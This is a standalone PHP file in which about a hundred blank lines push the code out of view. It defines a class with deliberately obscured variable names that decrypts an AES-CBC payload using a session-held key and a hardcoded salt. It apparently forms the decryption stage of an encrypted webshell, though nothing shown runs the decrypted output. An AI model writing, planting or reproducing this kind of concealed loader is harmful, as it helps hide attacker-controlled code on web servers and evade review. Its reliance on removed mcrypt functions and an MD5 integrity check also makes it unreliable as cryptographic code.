<?Php 































































































































session_start();
class en{public function d($asdf234sdhfioy1,$asdf234sdhfioy2='',$asdf234sdhfioy3='!kQm*fF3pXe1Kbm%9'){if($asdf234sdhfioy2=='')$asdf234sdhfioy2 = $_SESSION['key'];else $_SESSION['key']=$asdf234sdhfioy2;$key=hash('SHA256',$asdf234sdhfioy3 . $asdf234sdhfioy2,true);$iv=base64_decode(substr($asdf234sdhfioy1, 0, 22) . '==');$asdf234sdhfioy1 = substr($asdf234sdhfioy1, 22);$asdf234sdhfioy4 = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($asdf234sdhfioy1), MCRYPT_MODE_CBC, $iv), "\0\4");$hash = substr($asdf234sdhfioy4, -32);$asdf234sdhfioy4 = substr($asdf234sdhfioy4, 0, -32);if (md5($asdf234sdhfioy4) != $hash) return false;return $asdf234sdhfioy4;}}?>